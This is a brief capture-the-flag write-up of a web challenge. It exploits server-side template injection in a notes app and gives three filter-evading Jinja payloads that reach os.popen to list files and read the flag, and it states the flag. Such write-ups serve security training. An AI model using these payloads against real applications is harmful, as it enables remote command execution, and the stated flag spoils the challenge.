Lotion
Category: Web
100 points
i am trying to make my own version of notion named lotion , Can you do security check for my app? http://chall.nitdgplug.org:30014/
Solution
Just another notes webapp.
Let’s see… oh damn, where’s my {{ 4 + 4 }}
? Looks like we’ve got here server side template injection.
After few attempts I finally exploit it with payload:
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f'
)|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls -al')|attr('read')()}}
Going deeper with:
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f'
)|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls -al secret-note')|attr('read')()}}
Gotcha!
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f'
)|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat secret-note/flag')|attr('read')()}}
Flag
GLUG{INJECTED_PR3TTY_G00D_HUH}